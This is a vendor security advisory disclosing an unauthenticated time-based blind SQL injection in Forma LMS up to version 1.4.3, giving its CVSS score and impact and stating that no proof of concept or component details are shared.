Unauthenticated SQL Injection in forma Lms <= 1.4.3

Swascan Offensive Security Team has identified a vulnerability on Forma LMS digital assets.

Forma Lms

Forma Lms is the natural evolution, or a “fork”, of the last open source version of the LMS platform Docebo.

Forma Lms is an open source e-learning platform, oriented towards business needs: integrability, automatic notifications and automatic enrolment policies, organisational chart, automatic certificates and of course all the typical functions of an LMS.

The product includes flexible user management, white labelling, reporting, online and classroom course management, videoconferencing. From the 3.x version, it also includes integration with H5P for content creation.

The project is carried out by the profit association Forma.Association, with over 50 companies, 200 personal members and 4.000 community users, which are constantly adding new features and making the software more complete and secure.

Several other companies around the world actually use Forma Lms.

Technical summary

Swascan’s Cyber Security Team discovered an important vulnerability on Forma Lms <= v.1.4.3

Vulnerability	CVSS 3.1
Forma Lms <= 1.4.3 – SQL Injection (unauthenticated)	8.6 – High [AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:L]

The application is vulnerable to unauthenticated SQL Injection attacks.

A remote unauthenticated attacker could exploit this vulnerability in order to access to the application DataBase. Once exploited, the attacker can exfiltrate or overwrite all the data within.

However, to exploit this vulnerability, the attacker needs to perform a large amount of HTTP requests retrieving one character at a time due to the Time-Based (Blind) technique.

The version 1.x of Forma Lms has reached the End of Support date in 2019, Forma.Association invites his customers to migrate to the newest versions 3.x which supports new coding standard and software layers as the last PHP version.
In accordance with Forma, no PoC or information about the vulnerable component will be shared.